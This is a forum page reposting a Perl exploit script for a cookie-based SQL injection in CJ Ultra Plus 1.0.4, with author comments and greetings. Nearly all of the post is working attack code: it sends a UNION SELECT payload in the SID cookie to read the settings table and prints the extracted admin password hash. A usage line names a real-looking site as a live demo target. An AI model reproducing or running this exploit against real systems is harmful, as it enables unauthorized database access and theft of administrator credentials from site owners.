• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    CJ Ultra Plus

    发布者: 雪落无声 | 发布时间: 2025-6-28 22:42| 查看数: 89| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #
    # CJ Ultra Plus <= v1.0.4 Cookie SQL Injection
    #
    # found and coded by -SmoG-  /\GermAn hAckZ0r
    # contact: ICQ - 266836394
    #
    #
    #
    #
    # hints: - sometimes the parameter "SID" is different to the normal one...
    # - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter
    # - salted DES (normaly "aa" will be the salt, but it can be different)
    # - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...
    #
    #
    # >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<

    use LWP::UserAgent;

    if ($#ARGV 1 !=1) {
    print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
    print "found and coded by -SmoG-\n";
    print "\n\nUsage: perl xploit.pl -victim\n";
    print "       perl xploit.pl http://gayxboy.com/\n\n"; #LiVe-Dem0! letZz pwnz the pedophile!!
    exit();
    }
    print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n";
    print "\nstarting exploit...";
    $target=$ARGV[0];
    chomp($target);
    if($target !~ /^http:\/\//)
    {
    $target = "http://".$target;
    }
    if($target !~ /\/$/)
    {
    $target .= "/";
    }
    @header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
    $response = $ua->get($target, @header);
    if ($response->is_success)
    {
    $temp = $response->content;
    if ($temp =~/(.*)SID=(.*);/)
    {
    $result=substr($temp,85,13);
    print "\n\adminhash: "; print $result;
    }
    }
    else
    {
    die "Error: ".$response->status_line;
    }



    来源:https://www.jb51.net/hack/5624.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表